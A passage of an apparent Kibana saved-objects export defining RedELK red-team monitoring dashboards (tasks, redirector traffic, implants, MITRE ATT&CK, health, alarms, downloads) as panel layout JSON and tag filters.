operator\",\"panelRefName\":\"panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":20,\"w\":48,\"h\":14,\"i\":\"b038a84c-9db0-4266-af43-c8023da4781a\"},\"panelIndex\":\"b038a84c-9db0-4266-af43-c8023da4781a\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"C2 tasks\",\"panelRefName\":\"panel_b038a84c-9db0-4266-af43-c8023da4781a\"}]", "timeRestore": false, "title": "RedELK - Tasks", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0523c8a0-d025-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "8f1a6a90-4b7e-47ef-aa74-a6037b7461e1:panel_8f1a6a90-4b7e-47ef-aa74-a6037b7461e1", "type": "visualization"}, {"id": "88db1280-d024-11ea-9301-a30a04251ae9", "name": "ecf77ead-e22f-4708-addf-0cbaaeb6fced:panel_ecf77ead-e22f-4708-addf-0cbaaeb6fced", "type": "visualization"}, {"id": "a5554e20-d025-11ea-9301-a30a04251ae9", "name": "ff3f84bc-6c84-43fd-aa0f-19e5a91be826:panel_ff3f84bc-6c84-43fd-aa0f-19e5a91be826", "type": "visualization"}, {"id": "afb6ce00-d022-11ea-9301-a30a04251ae9", "name": "23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e:panel_23d6ee17-d74f-4a5b-88e4-d286c4b5dd2e", "type": "visualization"}, {"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "b038a84c-9db0-4266-af43-c8023da4781a:panel_b038a84c-9db0-4266-af43-c8023da4781a", "type": "search"}], "sort": [1642152857910, 2066], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_redteam\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_redteam\"}}},{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":true,\"key\":\"tags\",\"negate\":false,\"params\":{\"query\":\"iplist_customer\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"iplist_customer\"}}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":2,\"i\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"w\":48,\"x\":0,\"y\":0},\"panelIndex\":\"948c1286-d4de-44a6-8fb2-95bf9252ed00\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_948c1286-d4de-44a6-8fb2-95bf9252ed00\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"w\":36,\"x\":0,\"y\":2},\"panelIndex\":\"ab9eb0fb-a164-4295-8177-865a2a67dccb\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"Filters\",\"panelRefName\":\"panel_ab9eb0fb-a164-4295-8177-865a2a67dccb\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":5,\"i\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"w\":12,\"x\":36,\"y\":2},\"panelIndex\":\"c630a33e-6a98-466d-8223-fd83e6947b8c\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic per backend\",\"panelRefName\":\"panel_c630a33e-6a98-466d-8223-fd83e6947b8c\"},{\"version\":\"7.10.0\",\"type\":\"map\",\"gridData\":{\"h\":15,\"i\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"w\":24,\"x\":0,\"y\":7},\"panelIndex\":\"1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\",\"embeddableConfig\":{\"hiddenLayers\":[],\"hidePanelTitles\":false,\"isLayerTOCOpen\":false,\"mapCenter\":{\"lat\":14.5701,\"lon\":121.0254,\"zoom\":17},\"openTOCDetails\":[],\"enhancements\":{}},\"title\":\"HTTP redir traffic map\",\"panelRefName\":\"panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"w\":24,\"x\":24,\"y\":7},\"panelIndex\":\"fc254327-57ac-4e5f-88f7-a32d48570289\",\"embeddableConfig\":{\"hidePanelTitles\":false,\"enhancements\":{}},\"title\":\"HTTP Redir traffic over time\",\"panelRefName\":\"panel_fc254327-57ac-4e5f-88f7-a32d48570289\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"h\":15,\"i\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"w\":24,\"x\":0,\"y\":22},\"panelIndex\":\"829f61cf-9374-4bb5-8214-34e6875e79da\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_829f61cf-9374-4bb5-8214-34e6875e79da\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"h\":22,\"i\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"w\":48,\"x\":0,\"y\":37},\"panelIndex\":\"0bc5f60b-f940-451a-886b-edff3512d180\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_0bc5f60b-f940-451a-886b-edff3512d180\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-1d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Traffic dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "0f8626d0-c6f4-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "redirtraffic", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "948c1286-d4de-44a6-8fb2-95bf9252ed00:panel_948c1286-d4de-44a6-8fb2-95bf9252ed00", "type": "visualization"}, {"id": "56350050-efe7-11eb-8a9f-2572da287875", "name": "ab9eb0fb-a164-4295-8177-865a2a67dccb:panel_ab9eb0fb-a164-4295-8177-865a2a67dccb", "type": "visualization"}, {"id": "d625ba60-efe8-11eb-8a9f-2572da287875", "name": "c630a33e-6a98-466d-8223-fd83e6947b8c:panel_c630a33e-6a98-466d-8223-fd83e6947b8c", "type": "visualization"}, {"id": "dd9e9510-efec-11eb-8a9f-2572da287875", "name": "1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a:panel_1d1c2c6a-85ff-4b82-9b8d-d172b6e1a57a", "type": "map"}, {"id": "be08d380-efe9-11eb-8a9f-2572da287875", "name": "fc254327-57ac-4e5f-88f7-a32d48570289:panel_fc254327-57ac-4e5f-88f7-a32d48570289", "type": "visualization"}, {"id": "cbb7d710-efee-11eb-8a9f-2572da287875", "name": "829f61cf-9374-4bb5-8214-34e6875e79da:panel_829f61cf-9374-4bb5-8214-34e6875e79da", "type": "visualization"}, {"id": "0f7dcd70-b982-11e8-94dd-171ae5c1fd1a", "name": "0bc5f60b-f940-451a-886b-edff3512d180:panel_0bc5f60b-f940-451a-886b-edff3512d180", "type": "search"}], "sort": [1642152857910, 2076], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK implants dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"lucene\",\"query\":\"\"},\"filter\":[{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"sandboxes_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"sandboxes_v01\"}},\"$state\":{\"store\":\"appState\"}},{\"meta\":{\"alias\":null,\"negate\":true,\"disabled\":false,\"type\":\"phrase\",\"key\":\"tags\",\"params\":{\"query\":\"testsystems_v01\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index\"},\"query\":{\"match_phrase\":{\"tags\":\"testsystems_v01\"}},\"$state\":{\"store\":\"appState\"}}]}"}, "optionsJSON": "{\"darkTheme\":false,\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":15,\"i\":\"1\"},\"panelIndex\":\"1\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":24,\"h\":15,\"i\":\"2\"},\"panelIndex\":\"2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":17,\"w\":24,\"h\":15,\"i\":\"3\"},\"panelIndex\":\"3\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":32,\"w\":48,\"h\":22,\"i\":\"4\"},\"panelIndex\":\"4\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_4\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":17,\"w\":24,\"h\":15,\"i\":\"5\"},\"panelIndex\":\"5\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_5\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},\"panelIndex\":\"a5e43e90-aa23-403a-9167-bfe8aff7fb6c\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":54,\"w\":48,\"h\":19,\"i\":\"b9915fcd-f22e-4326-986a-25684f947b79\"},\"panelIndex\":\"b9915fcd-f22e-4326-986a-25684f947b79\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_b9915fcd-f22e-4326-986a-25684f947b79\"}]", "refreshInterval": {"pause": false, "value": 30000}, "timeFrom": "now-30d", "timeRestore": true, "timeTo": "now", "title": "RedELK - Implants dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "117dbba0-c6f5-11e8-a9c6-cd307b96b1ba", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", "type": "index-pattern"}, {"id": "rtops", "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[1].meta.index", "type": "index-pattern"}, {"id": "e12434d0-b8e8-11e8-94dd-171ae5c1fd1a", "name": "1:panel_1", "type": "visualization"}, {"id": "88003df0-b8ec-11e8-94dd-171ae5c1fd1a", "name": "2:panel_2", "type": "visualization"}, {"id": "10dcc4a0-b8e7-11e8-94dd-171ae5c1fd1a", "name": "3:panel_3", "type": "visualization"}, {"id": "f0dcbda0-b8e5-11e8-94dd-171ae5c1fd1a", "name": "4:panel_4", "type": "visualization"}, {"id": "a1efc620-b8e4-11e8-94dd-171ae5c1fd1a", "name": "5:panel_5", "type": "visualization"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "a5e43e90-aa23-403a-9167-bfe8aff7fb6c:panel_a5e43e90-aa23-403a-9167-bfe8aff7fb6c", "type": "visualization"}, {"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "b9915fcd-f22e-4326-986a-25684f947b79:panel_b9915fcd-f22e-4326-986a-25684f947b79", "type": "search"}], "sort": [1642152857910, 2086], "type": "dashboard", "version": "1"} -{"attributes": {"description": "MITRE ATT&CK dashboard showing TTPs used (SIEM detection must be configured first)", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":21,\"h\":17,\"i\":\"e4271670-160e-444d-bb78-46ae1e1c7339\"},\"panelIndex\":\"e4271670-160e-444d-bb78-46ae1e1c7339\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Tactics\",\"panelRefName\":\"panel_e4271670-160e-444d-bb78-46ae1e1c7339\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":21,\"y\":2,\"w\":27,\"h\":17,\"i\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},\"panelIndex\":\"6b3738e3-3bd8-417f-866a-f7c990b0b6f8\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"MITRE ATT&CK Techniques\",\"panelRefName\":\"panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":19,\"w\":24,\"h\":15,\"i\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\"},\"panelIndex\":\"de3ced26-2a55-43f5-af28-dc5c2b967c29\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_de3ced26-2a55-43f5-af28-dc5c2b967c29\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":19,\"w\":24,\"h\":15,\"i\":\"38e24827-8707-4583-805a-98e4138495a7\"},\"panelIndex\":\"38e24827-8707-4583-805a-98e4138495a7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_38e24827-8707-4583-805a-98e4138495a7\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":34,\"w\":48,\"h\":15,\"i\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\"},\"panelIndex\":\"60dc249a-1ad0-456c-850b-95c77ea0bc18\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_60dc249a-1ad0-456c-850b-95c77ea0bc18\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\"},\"panelIndex\":\"3b895da0-50d0-49e0-a18d-790fd2dddaaa\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa\"}]", "timeRestore": false, "title": "RedELK - MITRE ATT&CK", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "3ed7a630-d051-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "ff3c3b80-d050-11ea-9301-a30a04251ae9", "name": "e4271670-160e-444d-bb78-46ae1e1c7339:panel_e4271670-160e-444d-bb78-46ae1e1c7339", "type": "visualization"}, {"id": "abdcd940-d050-11ea-9301-a30a04251ae9", "name": "6b3738e3-3bd8-417f-866a-f7c990b0b6f8:panel_6b3738e3-3bd8-417f-866a-f7c990b0b6f8", "type": "visualization"}, {"id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "name": "de3ced26-2a55-43f5-af28-dc5c2b967c29:panel_de3ced26-2a55-43f5-af28-dc5c2b967c29", "type": "visualization"}, {"id": "231792d0-d050-11ea-9301-a30a04251ae9", "name": "38e24827-8707-4583-805a-98e4138495a7:panel_38e24827-8707-4583-805a-98e4138495a7", "type": "visualization"}, {"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "60dc249a-1ad0-456c-850b-95c77ea0bc18:panel_60dc249a-1ad0-456c-850b-95c77ea0bc18", "type": "search"}, {"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "3b895da0-50d0-49e0-a18d-790fd2dddaaa:panel_3b895da0-50d0-49e0-a18d-790fd2dddaaa", "type": "visualization"}], "sort": [1642152857910, 2093], "type": "dashboard", "version": "1"} -{"attributes": {"description": "", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},\"panelIndex\":\"5f3b82fd-613e-460e-a5a3-b7a9c9036060\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":48,\"h\":2,\"i\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},\"panelIndex\":\"cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\",\"embeddableConfig\":{\"hidePanelTitles\":true,\"enhancements\":{}},\"panelRefName\":\"panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":4,\"w\":16,\"h\":7,\"i\":\"cd30bef4-7955-437a-adaf-317839c35931\"},\"panelIndex\":\"cd30bef4-7955-437a-adaf-317839c35931\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd30bef4-7955-437a-adaf-317839c35931\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":16,\"y\":4,\"w\":21,\"h\":18,\"i\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\"},\"panelIndex\":\"cc62352b-f1ed-47fb-9687-d51a44693d13\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cc62352b-f1ed-47fb-9687-d51a44693d13\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":37,\"y\":4,\"w\":11,\"h\":18,\"i\":\"1d8af391-0559-412f-a001-12acc85b49ab\"},\"panelIndex\":\"1d8af391-0559-412f-a001-12acc85b49ab\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1d8af391-0559-412f-a001-12acc85b49ab\"},{\"version\":\"7.10.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":11,\"w\":16,\"h\":11,\"i\":\"cd45ce11-0279-476b-90c3-bd5733193a72\"},\"panelIndex\":\"cd45ce11-0279-476b-90c3-bd5733193a72\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_cd45ce11-0279-476b-90c3-bd5733193a72\"},{\"version\":\"7.10.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":22,\"w\":48,\"h\":16,\"i\":\"aa8ee839-556c-47ce-81af-451090b86f71\"},\"panelIndex\":\"aa8ee839-556c-47ce-81af-451090b86f71\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_aa8ee839-556c-47ce-81af-451090b86f71\"}]", "refreshInterval": {"pause": true, "value": 0}, "timeFrom": "now-15y", "timeRestore": true, "timeTo": "now", "title": "RedELK - Health", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "509e6a80-926a-11eb-a753-9da683898c26", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "5f3b82fd-613e-460e-a5a3-b7a9c9036060:panel_5f3b82fd-613e-460e-a5a3-b7a9c9036060", "type": "visualization"}, {"id": "45491770-0886-11eb-a2d2-171dc8941414", "name": "cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2:panel_cf429e43-5aaf-4e6b-8c3b-04c1bbd998b2", "type": "visualization"}, {"id": "20fac240-926c-11eb-a753-9da683898c26", "name": "cd30bef4-7955-437a-adaf-317839c35931:panel_cd30bef4-7955-437a-adaf-317839c35931", "type": "visualization"}, {"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "cc62352b-f1ed-47fb-9687-d51a44693d13:panel_cc62352b-f1ed-47fb-9687-d51a44693d13", "type": "search"}, {"id": "2f971ac0-926b-11eb-a753-9da683898c26", "name": "1d8af391-0559-412f-a001-12acc85b49ab:panel_1d8af391-0559-412f-a001-12acc85b49ab", "type": "visualization"}, {"id": "2f77a150-926a-11eb-a753-9da683898c26", "name": "cd45ce11-0279-476b-90c3-bd5733193a72:panel_cd45ce11-0279-476b-90c3-bd5733193a72", "type": "visualization"}, {"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "aa8ee839-556c-47ce-81af-451090b86f71:panel_aa8ee839-556c-47ce-81af-451090b86f71", "type": "search"}], "sort": [1642152857910, 2101], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK alarms dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "optionsJSON": "{\"hidePanelTitles\":false,\"useMargins\":true}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":18,\"h\":11,\"i\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\"},\"panelIndex\":\"74b481ca-ae10-4039-b6bf-474b5a409c0e\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC over time\",\"panelRefName\":\"panel_74b481ca-ae10-4039-b6bf-474b5a409c0e\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":18,\"y\":2,\"w\":6,\"h\":11,\"i\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\"},\"panelIndex\":\"13abf5b9-28bf-4d51-9c63-2416603499e7\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_13abf5b9-28bf-4d51-9c63-2416603499e7\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":6,\"h\":11,\"i\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},\"panelIndex\":\"e146bc43-4ec7-4fbb-8dcf-3df505b52932\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":30,\"y\":2,\"w\":18,\"h\":11,\"i\":\"c8ae192f-f081-49eb-8e60-3122d0377314\"},\"panelIndex\":\"c8ae192f-f081-49eb-8e60-3122d0377314\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic over time\",\"panelRefName\":\"panel_c8ae192f-f081-49eb-8e60-3122d0377314\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":14,\"i\":\"b95813af-9600-4e44-93de-9acfaa6f911c\"},\"panelIndex\":\"b95813af-9600-4e44-93de-9acfaa6f911c\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed IOC\",\"panelRefName\":\"panel_b95813af-9600-4e44-93de-9acfaa6f911c\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":27,\"w\":48,\"h\":17,\"i\":\"67fd9bda-6d1a-4089-a588-b683ad113558\"},\"panelIndex\":\"67fd9bda-6d1a-4089-a588-b683ad113558\",\"embeddableConfig\":{\"enhancements\":{}},\"title\":\"Alarmed traffic\",\"panelRefName\":\"panel_67fd9bda-6d1a-4089-a588-b683ad113558\"}]", "timeRestore": false, "title": "RedELK - Alarms dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "53b69200-d4e3-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "name": "74b481ca-ae10-4039-b6bf-474b5a409c0e:panel_74b481ca-ae10-4039-b6bf-474b5a409c0e", "type": "visualization"}, {"id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "name": "13abf5b9-28bf-4d51-9c63-2416603499e7:panel_13abf5b9-28bf-4d51-9c63-2416603499e7", "type": "visualization"}, {"id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "name": "e146bc43-4ec7-4fbb-8dcf-3df505b52932:panel_e146bc43-4ec7-4fbb-8dcf-3df505b52932", "type": "visualization"}, {"id": "f7141500-d4e1-11ea-9301-a30a04251ae9", "name": "c8ae192f-f081-49eb-8e60-3122d0377314:panel_c8ae192f-f081-49eb-8e60-3122d0377314", "type": "visualization"}, {"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "b95813af-9600-4e44-93de-9acfaa6f911c:panel_b95813af-9600-4e44-93de-9acfaa6f911c", "type": "search"}, {"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "67fd9bda-6d1a-4089-a588-b683ad113558:panel_67fd9bda-6d1a-4089-a588-b683ad113558", "type": "search"}], "sort": [1642152857910, 2109], "type": "dashboard", "version": "1"} -{"attributes": {"description": "RedELK downloads dashboard", "hits": 0, "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "optionsJSON": "{\"useMargins\":true,\"hidePanelTitles\":false}", "panelsJSON": "[{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":0,\"w\":48,\"h\":2,\"i\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\"},\"panelIndex\":\"80f94a01-4e80-42c2-b67e-971bab6e0526\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_80f94a01-4e80-42c2-b67e-971bab6e0526\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":31,\"y\":2,\"w\":17,\"h\":11,\"i\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\"},\"panelIndex\":\"55aca97f-b1f0-43b1-af44-756fe59be5fc\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_55aca97f-b1f0-43b1-af44-756fe59be5fc\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":0,\"y\":2,\"w\":24,\"h\":11,\"i\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},\"panelIndex\":\"8375955c-eab4-48d9-ac8a-e4de3dd6fab2\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_8375955c-eab4-48d9-ac8a-e4de3dd6fab2\"},{\"version\":\"7.8.0\",\"type\":\"visualization\",\"gridData\":{\"x\":24,\"y\":2,\"w\":7,\"h\":11,\"i\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},\"panelIndex\":\"1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\",\"embeddableConfig\":{\"enhancements\":{}},\"panelRefName\":\"panel_1e1864e7-1cbf-41bf-a9a5-8afadce8cadf\"},{\"version\":\"7.8.0\",\"type\":\"search\",\"gridData\":{\"x\":0,\"y\":13,\"w\":48,\"h\":16,\"i\":\"9a987436-c698-4236-9b92-bfab81de8cc1\"},\"panelIndex\":\"9a987436-c698-4236-9b92-bfab81de8cc1\",\"embeddableConfig\":{\"sort\":[\"@timestamp\",\"desc\",[\"@timestamp\",\"desc\"]],\"enhancements\":{}},\"panelRefName\":\"panel_9a987436-c698-4236-9b92-bfab81de8cc1\"}]", "timeRestore": false, "title": "RedELK - Downloads dashboard", "version": 1}, "coreMigrationVersion": "7.16.2", "id": "643de010-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"dashboard": "7.16.0"}, "references": [{"id": "0f82b540-d237-11ea-9301-a30a04251ae9", "name": "80f94a01-4e80-42c2-b67e-971bab6e0526:panel_80f94a01-4e80-42c2-b67e-971bab6e0526", "type": "visualization"}, {"id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "name": "55aca97f-b1f0-43b1-af44-756fe59be5fc:panel_55aca97f-b1f0-43b1-af44-756fe59be5fc", "type": "visualization"}, {"id": "85446c80-d04b-11ea-9301-a30a04251ae9", 